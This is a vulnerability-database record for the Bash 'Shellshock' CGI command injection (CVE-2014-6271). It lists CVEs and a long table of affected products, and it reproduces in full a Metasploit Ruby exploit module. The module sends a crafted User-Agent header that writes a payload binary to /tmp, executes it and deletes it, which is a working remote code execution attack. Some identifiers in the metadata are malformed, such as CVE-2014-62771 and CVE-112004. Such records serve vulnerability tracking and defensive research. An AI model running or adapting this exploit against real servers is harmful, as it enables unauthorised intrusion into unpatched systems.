ID
VAR-E-201410-0022
CVE
| cve_id: | CVE-2014-7910 | Trust: 1.0 |
| cve_id: | CVE-2014-7227 | Trust: 1.0 |
| cve_id: | CVE-2014-7196 | Trust: 1.0 |
| cve_id: | CVE-2014-7169 | Trust: 1.0 |
| cve_id: | CVE-2014-62771 | Trust: 1.0 |
| cve_id: | CVE-2014-6271 | Trust: 1.0 |
| cve_id: | CVE-2014-3671 | Trust: 1.0 |
| cve_id: | CVE-2014-3659 | Trust: 1.0 |
| cve_id: | CVE-2014-6277 | Trust: 0.3 |
EDB ID
34895
TITLE
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) - CGI webapps Exploit
Trust: 1.0
DESCRIPTION
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit). CVE-2014-7910CVE-2014-7227CVE-2014-7196CVE-2014-7169CVE-112004CVE-2014-62771CVE-2014-6271CVE-2014-3671CVE-2014-3659 . webapps exploit for CGI platform
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | bash | model: | cgi | scope: | - | version: | - | Trust: 1.0 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.6 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7245 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7242 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7238 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7235 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7232 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7228 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 78000 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 67000 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9393 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9303 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9302 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9301 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | sun | model: | solaris | scope: | eq | version: | 11 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux client | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux long life server | scope: | eq | version: | 5.6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.1 | Trust: 0.3 |
| vendor: | oracle | model: | linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway patch | scope: | eq | version: | 7.01 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.22 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.21 | Trust: 0.3 |
| vendor: | ibm | model: | ds8000 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 5.3 | Trust: 0.3 |
| vendor: | hp | model: | insight control | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.1.4 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0.16 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.1 | Trust: 0.3 |
| vendor: | gnu | model: | bash rc1 | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2.48 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.00.0(2) | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0 | Trust: 0.3 |
| vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cosmicperl | model: | directory pro | scope: | eq | version: | 10.0.3 | Trust: 0.3 |
| vendor: | cisco | model: | wide area application services | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified ip phone | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified contact center express | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | network analysis module | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | mds | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | gss 4492r global site selector | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | emergency responder | scope: | eq | version: | 1.1 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | show and share | scope: | eq | version: | 5(2) | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16.2 | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.11 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.10 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.03 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Shellshock Bashed CGI RCE',
'Description' => %q{
This module exploits the shellshock vulnerability in apache cgi. It allows you to
excute any metasploit payload you want.
},
'Author' =>
[
'Stephane Chazelas', # vuln discovery
'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6271' ]
],
'Payload' =>
{
'BadChars' => "",
},
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 13 2014'))
register_options(
[
OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,
OptString.new('FILEPATH', [true, 'The url ', '/tmp'])
], self.class)
end
def exploit
@payload_name = "#{rand_text_alpha(5)}"
full_path = datastore['FILEPATH'] + '/' + @payload_name
payload_exe = generate_payload_exe
if payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Creating payload #{full_path}")
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'agent' => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" + "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\""
})
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
'Shellshock' Remote Command Injection (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
CREDITS
Fady Mohammed Osman
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-3671 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7196 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7227 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7910 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7169 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-62771 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-6271 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-3659 | Trust: 1.0 |
| db: | EXPLOIT-DB | id: | 34895 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-6277 | Trust: 0.3 |
| db: | BID | id: | 70165 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7910 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7169 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-6271 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-62771 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7196 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-3659 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7227 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-3671 | Trust: 1.0 |
| url: | http://www.gnu.org/software/bash/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 70165 |
| db: | EXPLOIT-DB | id: | 34895 |
LAST UPDATE DATE
2023-05-30T10:41:05.868000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 70165 | date: | 2015-10-26T16:51:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 70165 | date: | 2014-09-27T00:00:00 |
| db: | EXPLOIT-DB | id: | 34895 | date: | 2014-10-06T00:00:00 |